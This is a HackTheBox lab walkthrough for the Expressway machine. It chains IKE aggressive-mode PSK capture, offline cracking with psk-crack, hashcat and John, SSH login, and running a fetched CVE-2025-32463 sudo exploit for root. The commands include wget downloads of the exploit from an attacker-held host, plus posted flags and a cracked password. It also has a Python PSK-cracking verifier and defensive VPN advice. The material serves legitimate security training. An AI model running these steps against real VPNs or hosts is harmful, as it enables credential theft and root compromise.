HTB Expressway Walkthrough

IKE/IPSec Exploitation & Sudo Chroot Privilege Escalation

Published: October 3, 2025 Difficulty: Medium

Expressway is a HackTheBox machine that demonstrates VPN security vulnerabilities through IKE/IPSec aggressive mode exploitation and Pre-Shared Key (PSK) cracking. This machine teaches network protocol analysis, VPN security assessment, and exploiting CVE-2025-32463 in sudo for privilege escalation.

Reconnaissance Phase

TCP Port Scanning

Objective: Discover open TCP ports and identify SSH authentication methods.

Perform a targeted scan on SSH with authentication method enumeration:

sudo nmap -p22 -sV --script ssh-auth-methods <TARGET_IP>

Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
| ssh-auth-methods: 
|   Supported authentication methods: 
|     publickey
|_    password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Key Findings:

  • SSH service running OpenSSH 10.0p2
  • Both publickey and password authentication enabled
  • Debian 8 Linux system

Key Learnings:

SSH authentication method enumeration helps identify available attack vectors. Both password and key-based authentication being enabled provides multiple potential entry points.

UDP Port Scanning

Objective: Discover UDP services, particularly VPN-related protocols.

Scan the top 15 UDP ports:

sudo nmap -sU -sV --top-ports 15 <TARGET_IP> -v

Discovery:

Discovered open port 500/udp on <TARGET_IP>

Port 500/UDP is used by IKE (Internet Key Exchange), which is the foundation of IPSec VPN connections.

IKE Version Detection:

sudo nmap -sU -p 500 --script ike-version <TARGET_IP>

Results:

PORT    STATE SERVICE
500/udp open  isakmp
| ike-version: 
|   attributes: 
|     XAUTH
|_    Dead Peer Detection v1.0

Key Findings:

  • IKE/ISAKMP service on UDP port 500
  • XAUTH (Extended Authentication) supported
  • Dead Peer Detection v1.0 enabled

Key Learnings:

UDP scanning is essential for discovering VPN and tunneling services. Port 500 is standard for IKE, which negotiates IPSec VPN connections.

IKE/IPSec Enumeration

IKE Aggressive Mode Scanning

Objective: Enumerate IKE aggressive mode to extract PSK hash for cracking.

Understanding IKE Modes:

  • Main Mode: More secure but slower (6 messages)
  • Aggressive Mode: Faster but exposes PSK hash (3 messages)

Aggressive mode is vulnerable because the responder's authentication hash (HASH_R, a keyed hash derived from the PSK) is sent unencrypted, so anyone who captures the exchange can run an offline brute-force or dictionary attack against the PSK.

Initial Aggressive Mode Scan:

sudo ike-scan -A -M <TARGET_IP>

Results:

10.10.11.87     Aggressive Mode Handshake returned
        HDR=(CKY-R=531bd2eace1c7d31)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

Critical Discovery:

VPN User ID: ike@expressway.htb

Encryption Details:

  • Encryption: 3DES
  • Hash: SHA1
  • DH Group: Group 2 (modp1024)
  • Authentication: PSK (Pre-Shared Key)
  • Lifetime: 28800 seconds (8 hours)

Key Learnings:

IKE aggressive mode leaks sensitive information including user identities and allows PSK hash extraction. This is a significant security vulnerability in VPN configurations.

PSK Hash Extraction

Objective: Extract the PSK hash in a format suitable for offline cracking.

Use the discovered user ID to extract PSK parameters:

sudo ike-scan -A -M -P --id=ike@expressway.htb <TARGET_IP>

Command explanation:

  • -A: Use aggressive mode
  • -M: Multiline output (display each decoded payload on its own line)
  • -P: Output PSK parameters for cracking
  • --id: Specify the VPN user ID

Results:

Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned
        HDR=(CKY-R=13bad56708b6f725)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
8c3d18d9b709f348d25b286d6563acc98a65cd386722773a27eccc418ec0c7d3318617398a8f04ad92fb48fcb9490bc2ea03dfa3aaecc378c3ac8e99da12eb54e63f36b922362a993b4f6487355bfd61000b3f2b842ecdc799e57aa2b362a2f4e5e023c0d20ad33f3007cb1dd6cfa35b2d3a8afa12c6f5b5154a3a9a38c60857:cee9578143b99a88fef49e086e73ef9e35317abedcc664f9bc26842b33ea70af4c6dd92a56037787a6ee49bc1a7517d2da46061679bbac717a5e4ab0e408229782b0d5c19f47bea2fd9d1d5c88bb80eb96ecf0c7c58de4d3afed05e9dbbb8b423b3013479e1508ee1681abff2b4e9e3a46a623b09ebc1f9f5e92ecf24e8aa3c2:13bad56708b6f725:0a5b5e672081dacf:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:048481af1437ae18b3a9a07893185480e1354afd:25ed6e5c8609307d34d1b72e98ec655e188d85be1183f4e113c3164e49adc516:443628570f8d2410f7fb0325b34a44f3f4ac2117

Save PSK Hash:

Create a file to store the PSK parameters:

sudo nano psk-hash.txt

Paste the entire PSK parameter string (the long colon-separated hash from the output).

Key Learnings:

The PSK parameters contain all necessary cryptographic material to perform offline dictionary attacks against the Pre-Shared Key. This data includes Diffie-Hellman exchanges, cookies, nonces, and the hash to crack.

Pre-Shared Key Cracking

Dictionary Attack on PSK

Objective: Crack the Pre-Shared Key using dictionary attacks.

Use psk-crack (part of ike-scan package) to crack the PSK:

psk-crack -d /usr/share/wordlists/rockyou.txt psk-hash.txt

Command explanation:

  • -d: Dictionary file to use (rockyou.txt)
  • psk-hash.txt: File containing PSK parameters

Cracking output:

Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 0bcb9a8e9c95bb108ca3b0dd3866c9c9156fd6ea
Ending psk-crack: 8045040 iterations in 5.276 seconds (1524824.57 iterations/sec)
Cracked PSK: freakingrockstarontheroad

Alternative Cracking Tools:

# Using hashcat: -m 5400 is IKE-PSK SHA1 (this capture negotiated Hash=SHA1);
# -m 5300 is the IKE-PSK MD5 variant
hashcat -m 5400 -a 0 psk-hash.txt /usr/share/wordlists/rockyou.txt

# Using John the Ripper
# Convert the ike-scan -P line first with the ikescan2john.py script shipped with John (jumbo)
ikescan2john.py psk-hash.txt > psk-john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt psk-john.txt

Key Learnings:

Weak Pre-Shared Keys in VPN configurations are vulnerable to dictionary attacks. Organizations should use strong, random PSKs and avoid aggressive mode when possible.
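Why the captured parameters are enough (the PSK Hash Extraction and Dictionary Attack steps above): HASH_R is an HMAC over values that are all public except the PSK, so a candidate key can be checked offline exactly as psk-crack does. The following Python is an added example, not part of the writeup or of ike-scan; the field order comes from the ike-scan -P header, the derivation from RFC 2409, and the sample line is constructed here (its HASH_R is computed from a made-up PSK), not the box's capture.

```python
import hashlib
import hmac

# Field order of an ike-scan -P line, as printed in the writeup (all hex):
# g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")
DIGEST_BY_LEN = {16: hashlib.md5, 20: hashlib.sha1}  # psk-crack also infers the hash from len(HASH_R)

def parse_psk_params(line):
    """Split a colon-separated ike-scan -P line into named byte fields."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError("expected %d fields, got %d" % (len(FIELDS), len(parts)))
    return dict(zip(FIELDS, (bytes.fromhex(v) for v in parts)))

def hash_r_for(psk, p):
    """RFC 2409 PSK auth with prf = HMAC-<hash>: SKEYID = prf(PSK, Ni_b|Nr_b) and
    HASH_R = prf(SKEYID, g^xr|g^xi|CKY-R|CKY-I|SAi_b|IDir_b). Every input but the PSK is public."""
    digest = DIGEST_BY_LEN[len(p["hash_r"])]
    skeyid = hmac.new(psk, p["ni_b"] + p["nr_b"], digest).digest()
    msg = p["g_xr"] + p["g_xi"] + p["cky_r"] + p["cky_i"] + p["sai_b"] + p["idir_b"]
    return hmac.new(skeyid, msg, digest).digest()

def find_psk(line, candidates):
    """Return the first candidate whose HASH_R equals the captured one, else None."""
    p = parse_psk_params(line)
    for cand in candidates:
        if hmac.compare_digest(hash_r_for(cand.encode(), p), p["hash_r"]):
            return cand
    return None

def _fill(tag, n):
    # Deterministic filler bytes for the constructed sample (not a real capture)
    return (hashlib.sha256(tag).digest() * (n // 32 + 1))[:n]

def make_sample_line(psk, use_md5=False):
    """Constructed ike-scan -P style line whose HASH_R really derives from psk; sizes
    mirror the writeup's capture (128-byte DH values, 8-byte cookies, 32-byte nonces)."""
    p = {"g_xr": _fill(b"g_xr", 128), "g_xi": _fill(b"g_xi", 128),
         "cky_r": _fill(b"cky_r", 8), "cky_i": _fill(b"cky_i", 8), "sai_b": _fill(b"sai_b", 56),
         "idir_b": b"\x03\x00\x00\x00" + b"ike@expressway.htb",  # ID_USER_FQDN, as seen on the box
         "ni_b": _fill(b"ni_b", 32), "nr_b": _fill(b"nr_b", 32)}
    p["hash_r"] = b"\x00" * (16 if use_md5 else 20)  # placeholder; its length selects the hash
    p["hash_r"] = hash_r_for(psk.encode(), p)
    return ":".join(p[f].hex() for f in FIELDS)

SAMPLE_LINE = make_sample_line("constructed-test-psk")  # constructed, not the box's capture
```

The same check is what a defender can run against their own gateway's PSK: if find_psk succeeds with a common wordlist, the PSK must be replaced.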

SSH Access with Cracked Credentials

Objective: Use the discovered username and cracked password for SSH authentication.

Compile discovered credentials:

Username: ike (from ike@expressway.htb)
Password: freakingrockstarontheroad

Connect via SSH:

ssh ike@<TARGET_IP>

Enter password when prompted: freakingrockstarontheroad

Initial Enumeration:

# Check current user and privileges
whoami
id

# List home directory
ls -la

# Check for user flag
cat user.txt
🚩 User Flag: 72ca3e6bb548d8f5b4b473a9a1a3790c

Key Learnings:

VPN credentials often match system login credentials. Organizations frequently reuse PSKs as system passwords, creating multiple attack vectors from a single compromised secret.

Privilege Escalation to Root

System Enumeration with LinPEAS

Objective: Perform automated privilege escalation enumeration.

Upload and run LinPEAS for comprehensive system enumeration:

Download LinPEAS:

# On your attacking machine
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

# Start a web server
python3 -m http.server 8000

On Target Machine:

# Download LinPEAS
wget http://YOUR_IP:8000/linpeas.sh

# Make executable
chmod +x linpeas.sh

# Run LinPEAS
./linpeas.sh

LinPEAS identifies potential privilege escalation vectors including vulnerable sudo versions.

Key Learnings:

Automated enumeration tools like LinPEAS save time and often identify vulnerabilities that manual checks might miss. They should be part of every privilege escalation workflow.

CVE-2025-32463: Sudo Chroot Vulnerability

Objective: Exploit the sudo chroot vulnerability to achieve root access.

Vulnerability Details:

  • CVE: CVE-2025-32463
  • Affected Component: sudo chroot functionality
  • Affected Versions: sudo 1.9.17 and earlier
  • Impact: Local privilege escalation to root

Vulnerability Explanation:

The vulnerability exists in how sudo handles chroot environments. Sudo's --chroot (-R) option lets an unprivileged user supply the directory to chroot into, and sudo then performs name-service lookups (reading /etc/nsswitch.conf) inside that user-controlled directory while still running as root, so a crafted nsswitch.conf can make sudo load a user-supplied shared library with root privileges; the fix shipped in sudo 1.9.17p1. When these conditions are met, an attacker can escape the chroot jail and execute commands with elevated privileges, leading to full root access.

Key Learnings:

Sudo vulnerabilities are particularly dangerous because sudo is installed on nearly every Linux system and is frequently used for privilege elevation. Keeping sudo updated is critical for system security.

Exploit Deployment and Execution

Objective: Deploy and execute the CVE-2025-32463 exploit.

Step 1: Download Exploit

# On attacking machine
git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot
cd CVE-2025-32463_chwoot

# Start web server
python3 -m http.server 8000

Step 2: Transfer to Target

# On target machine
cd /tmp
wget http://YOUR_IP:8000/exploit.sh

# Or if you copied the code directly
nano exploit.sh
# Paste the exploit code

Step 3: Make Executable

chmod 766 exploit.sh

The 766 permissions give:

  • Owner: read, write, execute (7)
  • Group: read, write (6)
  • Others: read, write (6)

Step 4: Execute Exploit

./exploit.sh

The exploit should successfully escalate privileges to root.

Verify Root Access:

whoami
id

Output should confirm root privileges.

Key Learnings:

Public exploits are readily available for known CVEs. Organizations must patch critical vulnerabilities quickly to prevent exploitation with publicly available tools.

Root Flag Retrieval

Objective: Retrieve the root flag and complete the challenge.

Navigate to root directory and read the flag:

cat /root/root.txt
🚩 Root Flag: ba620c13e51a134a10db4a468393578b

Post-Exploitation Activities:

# View root directory contents
ls -la /root/

# Check sudo version
sudo --version

# View system information
uname -a
cat /etc/os-release

# Check for other users
cat /etc/passwd | grep -v nologin

# View command history
cat /root/.bash_history

# Check cron jobs
crontab -l
ls -la /etc/cron*

Key Learnings:

Root access provides complete system control. In real penetration tests, this stage would involve documenting all findings, collecting evidence, and preparing the final report.

Challenge Summary

Complete Attack Chain

Full Exploitation Path:

  1. TCP Reconnaissance: Discovered SSH service with multiple authentication methods
  2. UDP Scanning: Identified IKE/IPSec service on port 500
  3. IKE Enumeration: Discovered aggressive mode enabled with user identity leak
  4. PSK Extraction: Captured Pre-Shared Key hash using ike-scan
  5. Credential Cracking: Successfully cracked PSK using dictionary attack
  6. SSH Access: Used cracked credentials to authenticate via SSH
  7. System Enumeration: Ran LinPEAS to identify privilege escalation vectors
  8. Sudo Exploitation: Exploited CVE-2025-32463 for root access

Flags Captured:

🚩 User Flag: 72ca3e6bb548d8f5b4b473a9a1a3790c
🚩 Root Flag: ba620c13e51a134a10db4a468393578b

Technical Skills Demonstrated:

  • TCP and UDP port scanning with Nmap
  • VPN protocol enumeration (IKE/IPSec)
  • IKE aggressive mode exploitation
  • Pre-Shared Key extraction and analysis
  • PSK cracking using dictionary attacks
  • SSH authentication and enumeration
  • Automated privilege escalation enumeration (LinPEAS)
  • CVE research and exploitation
  • Sudo vulnerability exploitation

Vulnerabilities Identified:

  • IKE Aggressive Mode: Exposes PSK hash for offline cracking
  • Weak Pre-Shared Key: Found in common wordlists
  • Credential Reuse: VPN PSK used as system password
  • CVE-2025-32463: Sudo chroot privilege escalation
  • Outdated Software: Vulnerable sudo version not patched

Defensive Recommendations:

  • Disable IKE Aggressive Mode: Use Main Mode for better security
  • Strong PSK Generation: Use long, random Pre-Shared Keys
  • Certificate-Based Authentication: Prefer certificates over PSKs
  • Avoid Credential Reuse: Never reuse VPN PSKs as system passwords
  • Regular Patching: Keep sudo and all system packages updated
  • Network Segmentation: Isolate VPN services from critical systems
  • Monitoring: Log and alert on VPN authentication attempts
  • Password Policy: Enforce strong password requirements

Tools and Techniques Used:

  • Nmap: TCP/UDP scanning and service detection
  • ike-scan: IKE aggressive mode enumeration and PSK extraction
  • psk-crack: Pre-Shared Key dictionary attacks
  • SSH: Remote system access
  • LinPEAS: Automated privilege escalation enumeration
  • CVE Exploit: Public sudo vulnerability exploit

Real-World Implications:

  • VPN misconfigurations are common in enterprise environments
  • IKE aggressive mode is still widely used despite security risks
  • Weak Pre-Shared Keys compromise entire VPN infrastructure
  • Credential reuse multiplies the impact of single compromises
  • Sudo vulnerabilities affect millions of Linux systems
  • Timely patching is critical for preventing exploitation

VPN Security Best Practices:

  • Always use IKE Main Mode instead of Aggressive Mode
  • Implement certificate-based authentication (X.509)
  • Use Perfect Forward Secrecy (PFS)
  • Regularly rotate Pre-Shared Keys
  • Monitor VPN logs for suspicious activity
  • Implement multi-factor authentication
  • Use strong encryption algorithms (AES-256, SHA-256+)
  • Avoid weak Diffie-Hellman groups (use Group 14+)
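The Defensive Recommendations and VPN Security Best Practices above map onto a handful of concrete gateway settings. As an added, constructed illustration (assumed strongSwan ipsec.conf syntax; the box's real configuration is not shown in the writeup), here is a profile resembling what ike-scan observed beside a hardened one:

```ini
# Weak profile: matches the proposal ike-scan returned (constructed, assumed strongSwan syntax)
conn legacy-remote-access
    keyexchange=ikev1
    aggressive=yes              # IKEv1 aggressive mode: HASH_R leaves the wire unencrypted
    authby=xauthpsk             # PSK (in ipsec.secrets) plus XAUTH, as the XAUTH VID showed
    xauth=server
    ike=3des-sha1-modp1024!     # 3DES, SHA1, DH group 2, exactly the SA seen above
    esp=3des-sha1!              # no DH group on the child SA: no PFS
    ikelifetime=8h              # LifeDuration=28800
    left=%defaultroute
    right=%any
    auto=add

# Hardened profile
conn remote-access
    keyexchange=ikev2           # IKEv2 has no aggressive mode at all
    leftcert=vpn-gateway.crt    # gateway authenticates with an X.509 certificate
    leftauth=pubkey
    rightauth=pubkey            # clients present certificates; no PSK to crack or reuse
    rightca="%same"
    ike=aes256-sha256-modp2048! # AES-256, SHA-256, DH group 14
    esp=aes256-sha256-modp2048! # DH group in the ESP proposal enables PFS on rekey
    ikelifetime=3h
    lifetime=1h
    dpdaction=clear
    dpddelay=30s
    left=%defaultroute
    right=%any
    auto=add
```

Log VPN authentication results (charon's log output or the equivalent on other daemons) and alert on repeated IKE_SA_INIT or authentication failures from one source, which covers the Monitoring recommendation.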